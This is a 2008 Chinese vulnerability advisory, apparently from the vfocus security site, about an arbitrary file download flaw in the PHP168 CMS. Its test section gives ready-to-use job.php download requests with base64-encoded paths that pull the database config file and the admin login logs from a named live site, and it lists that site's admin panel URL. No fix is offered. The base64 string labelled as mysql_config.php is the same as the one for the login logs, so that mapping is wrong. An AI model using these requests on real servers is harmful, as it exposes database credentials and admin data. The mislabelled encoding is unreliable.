首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
PHP168 下载任意文件漏洞
来源:www.vfcocus.net 作者:vfocus 发布时间:2008-11-03  
影响版本:
2008
漏洞描述:
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。

利用了程序的编码漏洞,下载配置和登陆日志文件
安全建议:
暂无
http://www.php168.com/
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:http://dabei.org/admin/index.php?iframe=1

Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="  (引号里面的是Base64加密后的)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Discuz! moderation.inc.php 数
·Discuz! trade.php 数据库'注射'
·Discuz! 数据库错误信息xss bug
·Discuz!4.x wap\index.php 变量
·Discuz! flash csrf vul
·Discuz! admincp.php xss bug
·世界之窗(The World)浏览器地址
·Discuz! modcp/moderate.inc.php
·自由动力(My Power)3.6 sp2的注
·Discuz! admin\runwizard.inc.ph
·Discuz! member.php xss bug
·Discuz! 路径信息泄露 bug
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved